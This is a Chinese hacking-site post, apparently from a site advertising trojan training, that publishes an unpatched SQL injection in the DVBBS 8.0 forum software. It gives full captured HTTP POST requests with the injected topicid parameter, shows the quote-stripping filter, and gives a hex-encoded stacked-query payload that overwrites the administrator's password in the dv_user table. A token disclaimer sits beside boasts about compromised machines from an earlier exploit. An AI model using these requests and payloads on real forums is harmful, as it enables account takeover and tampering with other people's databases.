|
编辑评语:上次的BBSXP漏洞相信大家仍然记忆犹新,都拿了不少肉鸡权限了吧,呵呵。不过千万别拿来做坏事了,华夏提供给大家的是一个技术研究的氛围,希望大家好好珍惜。今天我们再来发布一个动网论坛最新版DVBBS8.0的最新漏洞,绝对0DAY哦,官方都没打补丁,不过已经通知官方,请各位自重。
再次提醒:本站提供的是技术研究氛围,请勿进行违法操作,本站对大家的行为后果不负任何责任!
|
小广告:
本站发布的两个0DAY都是现任的木马特训班讲师,华夏特约金牌讲师“孤独包子”所发现公布的,同时更多的0DAY尚在研究测试中,华夏将秉着为普及中国网络安全做贡献的宗旨不断地为网络爱好者及华夏的支持着无私奉献,继续提供新的技术、发布新的0DAY。同时,华夏木马查杀特训班仍在继续招生,希望大家能够积极参与!
@@@@@@加入木马特训班,接触0DAY研究高手@@@@@@
http://www.77169.com/pay/more.html |
我这边已经假设好了一个DVBBS8 SQL:
我们先来注册一个用户,随便找个帖子。刚才弄坏了。。。。
我们来重新发个帖子。点发表评论,这里来抓包
以下是代码片段:
POST /dvbbs8/Appraise.asp?action=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://192.168.1.91/dvbbs8/dispbbs.asp?boardID=1&ID=2&page=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
Host: 192.168.1.91
Content-Length: 91
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: DvForum=UserID=3&usercookies=0&StatUserID=197615644&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=allyesno&password=v0qdt2f765U6x7J5&userhidden=2; w0802=3; rtime=0; ltime=1186473801000; w08_eid=88452409-http%3A//192.168.1.91/dvbbs8/index.asp%3Fboardid%3D1; geturl=%2Fdvbbs8%2Fpost%5Fupload%2Easp%3Fboardid%3D1; ASPSESSIONIDACCRCQQQ=FDKDFDBAOGGEGNICMPBANLKL; Dvbbs=cacgffcf; upNum=0
boardid=1&topicid=2&announceid=2&atype=0&a1=0&a2=0&atitle=11111&acodestr=0425&acontent=test |
OK,LET's start
LET's make fun
userpost是用户发表过的帖子数量。算错了
以下是代码片段:
script language='javascript'> <font face="宋体" size=2>
p>Microsoft OLE DB Provider for SQL Server</font> <font face="宋体" size=2>错误
'80040e14'</font>
p>
font face="宋体" size=2>第 1 行: ';' 附近有语法错误。</font>
p>
font face="宋体" size=2>/dvbbs8/inc/Dv_ClsMain.asp</font><font face="宋体" siz
2>,行 1504</font> |
出现一个这个,不要管他,其实我们已经修改成功了!
文章:100
我们继续来修改,其实是这样的,程序有点小问题需要我们来解决
以下是代码片段:
TopicID = Dvbbs.CheckStr(Request.Form("topicid"))
Public Function Checkstr(Str)
If Isnull(Str) Then
CheckStr = ""
Exit Function
End If
Str = Replace(Str,Chr(0),"")
CheckStr = Replace(Str,"'","''")
End Function
|
很明显过滤了单引号。。。。我们这样来饶过
还是修改一下密码吧,现在ADMIN的密码是admin888,我们来把他修改成123456
以下是代码片段:
declare @a sysname
select @a=0x3400390062006100350039006100620062006500350036006500300035003700
update [dv_user] set userpassword=@a where userid=1 |
这样可以修改成功!!!我们把他改回来
OK,这句语句也可以执行
156
看见没,已经修改成了123456
由于漏洞比较严重,请大家谨慎使用,官方还未打补丁!!!!!!
附:两段测试代码
|
以下是测试代码片段一:
POST /dvbbs8/Appraise.asp?action=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://192.168.1.91/dvbbs8/dispbbs.asp?boardID=1&ID=2&page=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
Host: 192.168.1.91
Content-Length: 151
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: DvForum=UserID=3&usercookies=0&StatUserID=197615644&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=allyesno&password=v0qdt2f765U6x7J5&userhidden=2; w0802=3; rtime=0; ltime=1186473801000; w08_eid=88452409-http%3A//192.168.1.91/dvbbs8/index.asp%3Fboardid%3D1; geturl=%2Fdvbbs8%2Fpost%5Fupload%2Easp%3Fboardid%3D1; ASPSESSIONIDACCRCQQQ=FDKDFDBAOGGEGNICMPBANLKL; Dvbbs=cacgffcf; upNum=0
boardid=1&topicid=2%3Bupdate+DV%5Fuser+set+userpost%3D100+where+userid%3D3&announceid=2&atype=0&a1=0&a2=0&atitle=11111&acodestr=0425&acontent=test |
由于上次BBSXP的漏洞很多人说不会用,因此这次将动画给大家同时发布出来,下面是链接地址:http://donghua.77169.com/HTML/32352.html(其中包含有操作过程中所利用到的软件)
下面是论坛讨论区:http://bbs.77169.com/read-htm-tid-194590-fpage-1.html
BBSXP漏洞讨论区:http://bbs.77169.com/read-htm-tid-192407-fpage-1.html
|
